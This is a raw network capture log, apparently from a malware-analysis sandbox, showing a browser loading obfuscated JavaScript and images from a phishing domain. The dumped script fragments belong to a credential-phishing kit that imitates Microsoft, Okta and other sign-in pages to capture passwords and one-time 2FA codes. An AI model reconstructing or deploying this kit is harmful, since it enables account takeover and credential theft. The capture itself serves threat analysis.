                                                        2024-07-03 19:07:22 UTC1369INData Raw: 10 69 58 16 18 ff 45 1e a2 6d 55 84 60 bb 94 83 f1 a5 aa 10 eb 80 6a 04 ba dd 16 24 bb cb 76 94 bb db 0e 54 fa b4 dd 28 f7 19 9d a8 f4 59 7b 91 ec f3 f6 a1 d0 17 ec 47 b1 2f ea 42 a1 2f 39 80 62 df 74 12 bc df 77 06 bc 3f 73 01 b9 7e ee 71 e4 fb bb 2d ec ef 7f d2 19 f5 41 7b 18 ef 31 87 58 ef 21 27 d1 79 d4 69 74 9e 74 8d 23 23 9b 2c 50 b6 a6 80 27 3b 52 c2 93 d9 40 c0 e7 aa a0 90 01 f3 29 68 ec d8 71 e2 04 83 80 00 e3 c2 05 82 1b 37 71 1e 3c 50 15 2c 96 c1 03 90 05 75 49 6e 2d 19 e1 95 12 4e d0 eb 09 a1 25 6a 42 ad 00 59 26 63 cf 71 3e 9d 2c 30 95 67 c9 12 c6 10 a1 01 97 41 48 16 7e 72 c0 e5 e1 a3 00 5c 91 be b5 13 b4 60 8d 50 60 16 62 8c 23 2c 93 87 41 a6 b8 c0 32 1b d9 cc f1 84 5d ca eb c5 8d 70 d0 ac bc 4b 85 93 72 39 40 ae f8 bc 94 2b 97 55 20 79 76
                                                        Data Ascii: iXEmU`j$vT(Y{G/B/9btw?s~q-A{1X!'yitt##,P';R@)hq7q<P,uIn-N%jBY&cq>,0gAH~r\`P`b#,A2]pKr9@+U yv
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 79 a5 b8 da 6d 00 aa 75 3c 04 9b 2b 02 72 61 45 50 0c 27 48 8a 66 58 8e 17 c4 72 ff 0a aa a6 1b a6 65 03 00 88 b0 24 13 ca b8 50 54 ad 3e b1 db 03 04 84 eb 88 80 62 38 41 52 34 c3 72 bc 20 96 b6 51 46 51 6b 9b a9 63 98 56 a3 e2 13 15 c2 04 21 e9 30 60 05 83 86 c4 8f e9 a0 a9 ff f0 17 a0 b7 17 e7 07 65 da fd 98 7e d8 04 c0 0d b5 75 78 ca 39 2a af 15 ac 6d 98 37 9c 46 60 a4 51 46 1b 63 ac 64 29 52 a5 49 97 21 53 56 45 1d 2a 36 25 95 a2 4c b9 8a 2a 47 ac 4a 54 ab 51 5b dd e8 d5 a3 41 e3 73 28 bc 75 10 b4 db 41 a5 28 53 8e 1e d2 f3 3a cc bc 1d 7c fc 10 25 da bd f2 fc a6 e8 16 82 4b 39 b0 71 4d 28 28 c1 54 d4 34 0d d5 a6 e7 9b d7 02 78 db f5 6f 2c 5c 2e 36 76 cf fe a6 f4 a5 10 31 09 09 d0 9e 36 f0 1f 3e 12 3b 49 4b 4b 4b 4b 4b bf cf 6e e5 eb f8 ee 58 bb 05 4a
                                                        Data Ascii: ymu<+raEP'HfXre$PT>b8AR4r QFQkcV!0`e~ux9*m7F`QFcd)RI!SVE*6%L*GJTQ[As(uA(S:|%K9qM((T4xo,\.6v16>;IKKKKKnXJ
                                                        2024-07-03 19:07:22 UTC1369INData Raw: a2 c5 d8 27 43 26 02 22 92 13 20 64 14 59 b2 e5 a0 3a 99 67 82 e6 ee 72 cf 1d 66 c7 a3 2c 1a da 79 0f 13 14 29 92 e2 71 c9 44 e4 e7 84 a0 c2 9f f7 0e ba a8 11 61 68 5f fa 1d ff f6 b8 d7 09 45 9d f7 18 61 a2 cf d1 a7 76 8f 13 7e b0 51 c5 d3 5b 09 40 57 2c 6f 6b b6 61 22 ea 37 fd 68 16 80 a1 c0 35 c2 0c d2 3a 85 ef 21 50 78 14 9f 15 27 6e bd a6 4d 6a 70 82 bc 56 5c ed c3 07 4f fc db 7e b8 f3 ce 26 a0 dc bc 05 0a 43 71 81 c0 11 41 31 9c 20 29 9a 61 39 5e 10 3b a3 77 e9 b5 a7 54 3d eb 39 f8 84 11 13 21 91 29 54 1a 9d c1 64 b1 39 5c 5e fe 82 0a 00 c0 d0 b2 c2 20 28 56 b8 c4 22 c4 92 8f 4b c4 db e9 d5 16 77 f3 73 34 90 cb 61 6b a5 67 b8 d1 63 dc 12 db 49 a1 78 8f 3a 70 56 78 9c f7 22 15 6d 55 d4 d2 cd 70 8f 4e b6 dd 48 9f a8 82 3e b4 c1 8c 26 b3 25 20 c1 88 90
                                                        Data Ascii: 'C&" dY:grf,y)qDah_Eav~Q[@W,oka"7h5:!Px'nMjpV\O~&CqA1 )a9^;wT=9!)Td9\^ (V"Kws4akgcIx:pVx"mUpNH>&%


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        64192.168.2.549794104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:22 UTC1362OUTGET /345f8FXSJyBv6seEmEdklOXxG5e6FIs89107 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:23 UTC652INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:23 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="345f8FXSJyBv6seEmEdklOXxG5e6FIs89107"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mBBauJpZ6hL%2BI5%2FqvIcJOyBS%2F762iwo5%2BKCKoezHy4zAFwEdqMM3tpMrP%2F88sXFWWShmKRA1BVXJSRJ8ww9NRH05BYV0FI0HwCP4KzCVeaP0Py8yWZiT26FTC603Ew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d92877a9728c1b-EWR
                                                        2024-07-03 19:07:23 UTC717INData Raw: 33 37 61 35 0d 0a 63 6f 6e 73 74 20 5f 30 78 34 31 66 66 65 64 3d 5f 30 78 31 36 30 39 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 36 63 63 28 29 7b 63 6f 6e 73 74 20 5f 30 78 34 37 64 66 61 38 3d 5b 27 6e 61 6d 65 27 2c 27 6f 6e 63 6c 69 63 6b 27 2c 27 6d 75 6c 74 62 61 63 6b 62 74 6e 63 6c 69 63 6b 27 2c 27 69 6e 70 75 74 2d 67 72 6f 75 70 27 2c 27 73 74 79 6c 65 27 2c 27 63 61 6c 6c 6f 74 70 27 2c 27 79 61 68 6f 6f 2e 63 6f 6d 27 2c 27 64 69 73 70 6c 61 79 27 2c 27 6f 74 70 5c 78 32 30 73 65 6e 74 27 2c 27 61 75 74 6f 63 6f 6d 70 6c 65 74 65 27 2c 27 64 75 70 6c 69 63 61 74 65 5c 78 32 30 72 65 71 75 65 73 74 27 2c 27 69 50 72 6f 6f 66 45 6d 61 69 6c 45 6e 74 72 79 27 2c 27 31 33 32 39 34 30 38 4b 55 53 68 44 5a 27 2c 27 61 75 74 68 61 70 70 69 6d 67 27
                                                        Data Ascii: 37a5const _0x41ffed=_0x1609;function _0x36cc(){const _0x47dfa8=['name','onclick','multbackbtnclick','input-group','style','callotp','yahoo.com','display','otp\x20sent','autocomplete','duplicate\x20request','iProofEmailEntry','1329408KUShDZ','authappimg'
                                                        2024-07-03 19:07:23 UTC1369INData Raw: 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 70 68 63 6f 6e 74 61 69 6e 65 72 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 50 68 6f 6e 65 45 6e 74 72 79 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 68 69 64 64 65 6e 3d 5c 78 32 32 74 72 75 65 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 6c 61 62 65 6c 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 50 68 6f 6e 65 48 69 6e 74 5c 78 32 32 5c 78 32 30 66 6f 72 3d 5c 78 32 32 69 50 72 6f 6f 66 50 68 6f 6e 65 5c 78 32 32 5c 78 32 30 63
                                                        Data Ascii: x20\x20\x20\x20\x20\x20<div\x20class=\x22phcontainer\x22\x20id=\x22iProofPhoneEntry\x22\x20style=\x22display:\x20none;\x22\x20aria-hidden=\x22true\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<label\x20id=\x22iProofPhoneHint\x22\x20for=\x22iProofPhone\x22\x20c
                                                        2024-07-03 19:07:23 UTC1369INData Raw: 27 62 61 63 6b 67 72 6f 75 6e 64 27 2c 27 74 79 70 65 27 2c 27 68 61 73 41 74 74 72 69 62 75 74 65 27 2c 27 73 65 63 74 69 6f 6e 73 5f 70 64 66 27 2c 27 69 6e 70 5f 75 6e 61 6d 65 27 2c 27 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 27 2c 27 52 65 71 75 65 73 74 5c 78 32 30 77 61 73 6e 5c 78 32 37 74 5c 78 32 30 73 65 6e 74 27 2c 27 65 72 72 6f 72 5f 75 6e 61 6d 65 27 2c 27 65 72 72 6f 72 5c 78 32 30 27 2c 27 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 27 2c 27 6a 73 6f 6e 27 2c 27 4d 69 63 72 6f 73 6f 66 74 5c 78 32 30 41 75 74 68 65 6e 74 69 63 61 74 6f 72 27 2c 27 66 6f 72 45 61 63 68 27 2c 27 70 61 72 65 6e 74 4e 6f 64 65 27 2c 27 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                        Data Ascii: 'background','type','hasAttribute','sections_pdf','inp_uname','background-image','Request\x20wasn\x27t\x20sent','error_uname','error\x20','sections_godaddy','json','Microsoft\x20Authenticator','forEach','parentNode','\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x
                                                        2024-07-03 19:07:23 UTC1369INData Raw: 27 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 27 2c 27 63 6f 6e 74 65 6e 74 27 2c 27 39 32 39 39 37 36 30 4c 42 78 5a 61 73 27 2c 27 70 68 63 6f 6e 74 61 69 6e 65 72 27 2c 27 73 65 63 74 69 6f 6e 5f 61 75 74 68 63 61 6c 6c 27 2c 27 67 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 23 66 35 66 37 66 38 27 2c 27 23 6d 61 69 6e 4c 6f 61 64 65 72 27 2c 27 73 69 67 6e 75 70 27 2c 27 73 65 63 74 69 6f 6e 5f 32 66 61 27 2c 27 66 61 64 65 6f 75 74 66 6f 72 6d 5c 78 32 30 31 73 5c 78 32 30 66 6f 72 77 61 72 64 73 27 2c 27 70 77 64 5f 6f 6b 74 61 27 2c 27 61 75 74 68 61 70 70 65 72 72 6f 72 64 65 73 63 27 2c 27 31 35 39 33 37 35 39 41 57 4c 42 59 4a 27 2c 27 61 72 69 61 2d 6c 69 76 65 27 2c 27 74 61 62 6c 65 27 2c 27 54 68 65 5c 78 32 30 77 72 6f 6e 67 5c 78 32 30 63 6f 64 65
                                                        Data Ascii: 'confirmemail','content','9299760LBxZas','phcontainer','section_authcall','getAttribute','#f5f7f8','#mainLoader','signup','section_2fa','fadeoutform\x201s\x20forwards','pwd_okta','authapperrordesc','1593759AWLBYJ','aria-live','table','The\x20wrong\x20code
                                                        2024-07-03 19:07:23 UTC1369INData Raw: 2c 27 50 6c 65 61 73 65 2c 5c 78 32 30 70 72 6f 76 69 64 65 5c 78 32 30 61 5c 78 32 30 76 61 6c 69 64 5c 78 32 30 65 6d 61 69 6c 2e 27 2c 27 6f 6b 74 61 27 2c 27 62 74 6e 5f 73 69 67 27 2c 27 50 4f 53 54 27 2c 27 72 65 73 65 6e 74 6c 69 6e 6b 27 2c 27 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 6f 70 74 69 6f 6e 73 27 2c 27 73 70 6c 69 74 27 2c 27 69 6e 70 75 74 27 2c 27 73 65 63 74 69 6f 6e 5f 79 6f 75 64 6f 6e 74 68 61 76 65 61 63 63 65 73 73 27 2c 27 70 6f 70 27 2c 27 45 6e 74 65 72 5c 78 32 30 61 5c 78 32 30 73 65 63 75 72 69 74 79 5c 78 32 30 63 6f 64 65 27 2c 27 70 72 65 73 65 6e 74 61 74 69 6f 6e 27 2c 27 6d 62 2d 31 36 27 2c 27 65 72 72 6f 72 27 2c 27 74 68 65 6e 27 2c 27 6e 75 6c 6c 27 2c 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 27 2c
                                                        Data Ascii: ,'Please,\x20provide\x20a\x20valid\x20email.','okta','btn_sig','POST','resentlink','multipleaccountoptions','split','input','section_youdonthaveaccess','pop','Enter\x20a\x20security\x20code','presentation','mb-16','error','then','null','querySelectorAll',
                                                        2024-07-03 19:07:23 UTC1369INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3a 3a 73 65 6c 65 63 74 69 6f 6e 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 3a 5c 78 32 30 23 61 36 66 66 66 38 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 27 2c 27 35 34 37 34 30 31 66 72 66 4b 59 61 27 2c 27 73 69 67 6e 69 6e 61 6e 6f 74 68 65 72 65 72 72 6f 72 64 65 73 63 27 2c 27 53 69 67
                                                        Data Ascii: 0\x20\x20\x20::selection\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background:\x20#a6fff8;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20','547401frfKYa','signinanothererrordesc','Sig
                                                        2024-07-03 19:07:23 UTC1369INData Raw: 79 5c 78 32 30 74 68 61 74 5c 78 32 30 74 68 69 73 5c 78 32 30 69 73 5c 78 32 30 79 6f 75 72 5c 78 32 30 65 6d 61 69 6c 5c 78 32 30 61 64 64 72 65 73 73 2c 5c 78 32 30 63 6f 6d 70 6c 65 74 65 5c 78 32 30 74 68 65 5c 78 32 30 68 69 64 64 65 6e 5c 78 32 30 70 61 72 74 5c 78 32 30 61 6e 64 5c 78 32 30 63 6c 69 63 6b 5c 78 32 30 5c 78 32 32 53 65 6e 64 5c 78 32 30 63 6f 64 65 5c 78 32 32 5c 78 32 30 74 6f 5c 78 32 30 72 65 63 65 69 76 65 5c 78 32 30 79 6f 75 72 5c 78 32 30 63 6f 64 65 2e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 72 6f 6c 65 3d 5c 78 32 32 61 6c 65 72 74 5c 78 32 32 5c 78 32 30
                                                        Data Ascii: y\x20that\x20this\x20is\x20your\x20email\x20address,\x20complete\x20the\x20hidden\x20part\x20and\x20click\x20\x22Send\x20code\x22\x20to\x20receive\x20your\x20code.\x0a\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20<div\x20role=\x22alert\x22\x20
                                                        2024-07-03 19:07:23 UTC1369INData Raw: 74 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 28 74 68 69 73 29 27 2c 27 56 65 72 69 66 79 5c 78 32 30 6f 6e 6c 69 6e 65 27 2c 27 75 73 65 41 75 74 68 65 6e 74 69 63 61 74 6f 72 27 2c 27 64 61 74 61 2d 6d 65 74 68 6f 64 69 64 27 2c 27 3c 73 70 61 6e 3e 53 6f 72 72 79 2c 5c 78 32 30 77 65 5c 78 32 37 72 65 5c 78 32 30 68 61 76 69 6e 67 5c 78 32 30 74 72 6f 75 62 6c 65 5c 78 32 30 76 65 72 69 66 79 69 6e 67 5c 78 32 30 79 6f 75 72 5c 78 32 30 61 63 63 6f 75 6e 74 2e 5c 78 32 30 50 6c 65 61 73 65 5c 78 32 30 74 72 79 5c 78 32 30 61 67 61 69 6e 2e 3c 2f 73 70 61 6e 3e 3c 61 5c 78 32 30 69 64 3d 5c 78 32 32 56 69 65 77 44 65 74 61 69 6c 73 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6e 6f 2d 77 72 61 70 5c 78 32 32 5c 78 32 30 68 72 65 66 3d 5c 78
                                                        Data Ascii: tmultipleaccount(this)','Verify\x20online','useAuthenticator','data-methodid','<span>Sorry,\x20we\x27re\x20having\x20trouble\x20verifying\x20your\x20account.\x20Please\x20try\x20again.</span><a\x20id=\x22ViewDetails\x22\x20class=\x22no-wrap\x22\x20href=\x
                                                        2024-07-03 19:07:23 UTC1369INData Raw: 6e 5f 74 72 79 61 67 61 69 6e 6c 61 74 65 72 27 2c 27 62 74 6e 5f 70 72 6f 74 65 63 74 61 63 63 6f 75 6e 74 27 2c 27 72 65 64 69 72 65 63 74 65 64 5c 78 32 30 62 61 63 6b 5c 78 32 30 74 6f 5c 78 32 30 73 69 67 6e 5c 78 32 30 69 6e 27 2c 27 69 50 72 6f 6f 66 50 68 6f 6e 65 48 69 6e 74 27 2c 27 6e 65 77 77 65 62 73 69 74 65 6f 70 65 6e 27 2c 27 74 61 62 6c 65 2d 72 6f 77 27 2c 27 5b 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 32 32 69 50 72 6f 6f 66 49 6e 70 75 74 45 72 72 6f 72 5c 78 32 32 5d 27 2c 27 63 68 65 63 6b 65 64 27 2c 27 6c 6f 67 6f 27 2c 27 72 6f 6c 65 27 2c 27 73 65 73 73 69 6f 6e 5c 78 32 30 74 69 6d 65 6f 75 74 27 2c 27 69 6e 70 5f 6f 74 70 63 6f 64 65 27 2c 27 69 6e 6e 65 72 54 65 78 74 27 2c 27 65 72 72 6f 72 5f 70 77 64 27 2c
                                                        Data Ascii: n_tryagainlater','btn_protectaccount','redirected\x20back\x20to\x20sign\x20in','iProofPhoneHint','newwebsiteopen','table-row','[aria-describedby=\x22iProofInputError\x22]','checked','logo','role','session\x20timeout','inp_otpcode','innerText','error_pwd',
                                                        2024-07-03 19:07:23 UTC1369INData Raw: 32 66 61 63 61 6e 63 65 6c 3d 30 78 30 2c 6f 74 70 74 79 70 65 3d 30 78 30 3b 76 61 72 20 63 75 72 72 65 6e 74 77 65 62 3d 30 78 30 3b 21 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 34 31 66 66 65 64 28 30 78 32 31 37 29 5d 28 5f 30 78 34 31 66 66 65 64 28 30 78 31 64 34 29 29 5b 5f 30 78 34 31 66 66 65 64 28 30 78 31 37 37 29 5d 5b 27 63 6f 6e 74 61 69 6e 73 27 5d 28 5f 30 78 34 31 66 66 65 64 28 30 78 31 63 39 29 29 26 26 28 76 69 65 77 3d 5f 30 78 34 31 66 66 65 64 28 30 78 31 35 65 29 29 3b 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 34 31 66 66 65 64 28 30 78 32 31 37 29 5d 28 27 73 65 63 74 69 6f 6e 73 5f 70 64 66 27 29 26 26 21 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 34 31 66 66 65 64 28 30 78 32 31 37 29 5d 28 5f 30 78 34 31 66 66 65 64 28 30 78 65 38 29 29 5b 5f 30
                                                        Data Ascii: 2facancel=0x0,otptype=0x0;var currentweb=0x0;!document[_0x41ffed(0x217)](_0x41ffed(0x1d4))[_0x41ffed(0x177)]['contains'](_0x41ffed(0x1c9))&&(view=_0x41ffed(0x15e));document[_0x41ffed(0x217)]('sections_pdf')&&!document[_0x41ffed(0x217)](_0x41ffed(0xe8))[_0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        65192.168.2.549796104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:22 UTC1457OUTGET /kliHDnAE0gTkmBMJlvBgKdx2UgHYVMjMpYKl2bzij6kYptmsP7Qz5ArvdibzdrlKBVuv220 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:23 UTC674INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:23 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="kliHDnAE0gTkmBMJlvBgKdx2UgHYVMjMpYKl2bzij6kYptmsP7Qz5ArvdibzdrlKBVuv220"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FcN3fjD8fkoMeXJY%2Fi4DnKCUPi7Z8WhUIH%2FwMr9u2DUMY3v6Sb69TDf7e4YrOyrm88onH%2F99b0WYkUziS7oWxIcX4Kri9Ste7Zu4iKoPUrAonknqsVKS3VL0bb0GFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d928783e3b42cd-EWR
                                                        2024-07-03 19:07:23 UTC695INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                        Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                        2024-07-03 19:07:23 UTC1176INData Raw: 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f
                                                        Data Ascii: -424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" sto
                                                        2024-07-03 19:07:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
